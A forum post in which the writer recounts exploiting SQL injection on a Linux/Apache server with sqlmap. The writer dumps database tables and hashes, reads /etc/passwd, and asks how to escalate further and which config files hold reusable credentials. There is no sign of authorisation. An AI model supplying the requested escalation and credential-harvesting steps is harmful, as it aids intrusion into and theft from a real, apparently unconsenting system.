Hi guys,
I'm currently trying to exploit some system.
It has a web server (apache) and runs on linux. Also has some more daemons : mysql, ftp server, the usual SSH server as well.
I didnt run a full nmap yet, only few main ports scanned.
I've noticed a SQL injection issue in pretty all website pages.
Which means I can now easily login to the user webpages.
But I'd like to go further, obviously. I want to see if I can end up completely r00ting the shit out of it
So I learned about sqlmap.
After struggling a bit with it (website was not properly returning if proper headers were not in HTTP request, etc) I managed to run it fine.
Now I can also dump (character by character) any table and columns in the sql db.
That's a good start.
I can get the mysql users and hashes but all the hostnames are localhost, so that doesnt really help me getting inside more (no direct access to db).
Also the db doesnt support stacked queries, so I cant get a sql-shell or os-shell and cant upload backdoor.
Anyone knows some way to bypass this without stacked queries ?
I know I can use SQL injection to retrieve files from the system (if I have enough time cause it's damn long). I started to retrieve /etc/passwd to check if I could.
Not sure which files could be interesting to get. I know that would be awesome to get /etc/shadow but it's not readable from the sql user...
I will definately read some .php from the website to gather intel on the site structure and also get maybe the connect ID/pass in clear, that would spare me some time cracking it.
Also the passwd might be the same for other services.
Any idea of other config files that would be good to get ?
I'll also go on dumping tables that could be of interest.
But then... not sure how to go on.
Any comments, clues, help, ideas, would be well appreciated
Thanks !
